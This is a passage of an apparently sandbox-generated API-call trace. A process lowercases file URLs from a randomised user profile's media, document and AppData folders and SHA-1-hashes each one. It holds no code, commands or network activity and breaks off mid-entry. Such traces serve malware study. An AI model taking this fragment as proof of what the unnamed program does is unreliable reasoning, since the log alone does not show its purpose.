wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6") returned 0x2d [0067.340] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6" [0067.340] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.340] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6") returned 0x2d [0067.341] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x5c, dwFlags=0x0) returned 1 [0067.341] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.341] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.341] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6") returned 0x2d [0067.341] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.341] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/") returned 0x2e [0067.341] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x5e, dwFlags=0x0) returned 1 [0067.341] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.341] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.341] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7") returned 0x40 [0067.341] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7" [0067.341] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.341] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7") returned 0x40 [0067.341] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x82, dwFlags=0x0) returned 1 [0067.341] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.341] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.341] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7") returned 0x40 [0067.341] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.341] wcslen (_String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7/") returned 0x41 [0067.341] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x84, dwFlags=0x0) returned 1 [0067.341] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.341] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.341] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/tAGEgh9.flv") returned 0x39 [0067.341] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/tAGEgh9.flv" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/tagegh9.flv") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/tagegh9.flv" [0067.341] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.341] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/tagegh9.flv") returned 0x39 [0067.341] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x74, dwFlags=0x0) returned 1 [0067.341] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.341] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.341] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/tagegh9.flv") returned 0x39 [0067.341] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.341] wcslen (_String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/tagegh9.flv/") returned 0x3a [0067.341] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x76, dwFlags=0x0) returned 1 [0067.341] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.341] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.341] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/3LEPPGgTaYsicWoc.mp3") returned 0x42 [0067.341] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/3LEPPGgTaYsicWoc.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/3leppggtaysicwoc.mp3") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/3leppggtaysicwoc.mp3" [0067.341] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.341] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/3leppggtaysicwoc.mp3") returned 0x42 [0067.341] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x86, dwFlags=0x0) returned 1 [0067.341] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.341] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.341] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/3leppggtaysicwoc.mp3") returned 0x42 [0067.341] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.341] wcslen (_String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/3leppggtaysicwoc.mp3/") returned 0x43 [0067.341] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x88, dwFlags=0x0) returned 1 [0067.341] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.341] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.342] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/X3JVu.bmp") returned 0x37 [0067.342] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/X3JVu.bmp" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/x3jvu.bmp") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/x3jvu.bmp" [0067.342] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.342] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x70, dwFlags=0x0) returned 1 [0067.342] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.342] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.342] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.342] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x72, dwFlags=0x0) returned 1 [0067.342] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.342] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.342] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/IhEUrbf.xlsx" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/iheurbf.xlsx") returned="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/iheurbf.xlsx" [0067.342] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.342] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.342] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.342] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.342] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.342] CryptHashData (hHash=0x65ed88, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.342] CryptGetHashParam (in: hHash=0x65ed88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.342] CryptDestroyHash (hHash=0x65ed88) returned 1 [0067.342] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/CIvwLQB/5b_aIhAxeugojKM7ud.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/civwlqb/5b_aihaxeugojkm7ud.wav") returned="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/civwlqb/5b_aihaxeugojkm7ud.wav" [0067.342] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.342] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xaa, dwFlags=0x0) returned 1 [0067.342] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.342] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.342] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.342] CryptHashData (hHash=0x65ed08, pbData=0x198270, dwDataLen=0xac, dwFlags=0x0) returned 1 [0067.342] CryptGetHashParam (in: hHash=0x65ed08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.342] CryptDestroyHash (hHash=0x65ed08) returned 1 [0067.342] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/t4tPcVg9UPnJ6f/xCWlj%20U.flv" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/xcwlj%20u.flv") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/xcwlj%20u.flv" [0067.342] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.342] CryptHashData (hHash=0x65ecc8, pbData=0x198270, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0067.342] CryptGetHashParam (in: hHash=0x65ecc8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.342] CryptDestroyHash (hHash=0x65ecc8) returned 1 [0067.342] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.342] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0xa2, dwFlags=0x0) returned 1 [0067.342] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.342] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.342] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/j5fG4lD94cLAZ/k0TONfG5bith.xlsx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/k0tonfg5bith.xlsx") returned="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/k0tonfg5bith.xlsx" [0067.342] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.342] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x90, dwFlags=0x0) returned 1 [0067.342] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.342] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.343] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.343] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x92, dwFlags=0x0) returned 1 [0067.343] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.343] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.343] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn" [0067.343] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.343] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x98, dwFlags=0x0) returned 1 [0067.343] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.343] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.343] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.343] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x9a, dwFlags=0x0) returned 1 [0067.343] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.343] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.343] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/5EwIyGm_ZOJL5972Y9b.xlsx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/5ewiygm_zojl5972y9b.xlsx") returned="file:///c:/users/ciihmnxmn6ps/documents/5ewiygm_zojl5972y9b.xlsx" [0067.343] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.343] CryptHashData (hHash=0x65ed08, pbData=0x198270, dwDataLen=0x82, dwFlags=0x0) returned 1 [0067.343] CryptGetHashParam (in: hHash=0x65ed08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.343] CryptDestroyHash (hHash=0x65ed08) returned 1 [0067.343] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.343] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x84, dwFlags=0x0) returned 1 [0067.343] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.343] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.343] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/cCuYC8T_lGIx.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/ccuyc8t_lgix.avi") returned="file:///c:/users/ciihmnxmn6ps/videos/ccuyc8t_lgix.avi" [0067.343] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.343] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x6c, dwFlags=0x0) returned 1 [0067.343] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.343] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.343] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.343] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6e, dwFlags=0x0) returned 1 [0067.343] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.343] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.343] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/pyRQnN%20_.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/pyrqnn%20_.wav") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/pyrqnn%20_.wav" [0067.343] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.343] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0067.344] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.344] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.344] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.344] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.344] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.344] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.344] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/IfQzieQsmsm85rzH.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/ifqzieqsmsm85rzh.jpg") returned="file:///c:/users/ciihmnxmn6ps/pictures/ifqzieqsmsm85rzh.jpg" [0067.344] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.344] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x78, dwFlags=0x0) returned 1 [0067.344] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.344] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.344] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.344] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0067.344] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.344] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.344] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn" | out: _String="file:///c:/users/ciihmnxmn6ps/music/czp7-etnxlndqfn") returned="file:///c:/users/ciihmnxmn6ps/music/czp7-etnxlndqfn" [0067.344] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.344] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x68, dwFlags=0x0) returned 1 [0067.344] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.344] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.344] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.344] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6a, dwFlags=0x0) returned 1 [0067.344] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.344] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.344] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/7bRkC.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/7brkc.gif") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/7brkc.gif" [0067.344] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.344] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x70, dwFlags=0x0) returned 1 [0067.344] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.344] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.344] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.344] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x72, dwFlags=0x0) returned 1 [0067.344] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.344] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.345] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/YBVOlJF1B%20vtW4.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/ybvoljf1b%20vtw4.jpg") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/ybvoljf1b%20vtw4.jpg" [0067.345] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.345] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x94, dwFlags=0x0) returned 1 [0067.345] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.345] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.345] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.345] CryptHashData (hHash=0x65ed88, pbData=0x198270, dwDataLen=0x96, dwFlags=0x0) returned 1 [0067.345] CryptGetHashParam (in: hHash=0x65ed88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.345] CryptDestroyHash (hHash=0x65ed88) returned 1 [0067.345] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/l0-CSOqDwy.xlsx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/l0-csoqdwy.xlsx") returned="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/l0-csoqdwy.xlsx" [0067.345] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.345] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x84, dwFlags=0x0) returned 1 [0067.345] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.345] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.345] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.345] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x86, dwFlags=0x0) returned 1 [0067.345] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.345] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.345] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/vYKCr2OBG.ots" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/vykcr2obg.ots") returned="file:///c:/users/ciihmnxmn6ps/documents/vykcr2obg.ots" [0067.345] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.345] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x6c, dwFlags=0x0) returned 1 [0067.345] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.345] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.345] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.345] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6e, dwFlags=0x0) returned 1 [0067.345] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.345] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.345] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/kda_baSrCvvno5CWt-.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/kda_basrcvvno5cwt-.avi") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/kda_basrcvvno5cwt-.avi" [0067.345] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.345] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x94, dwFlags=0x0) returned 1 [0067.345] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: 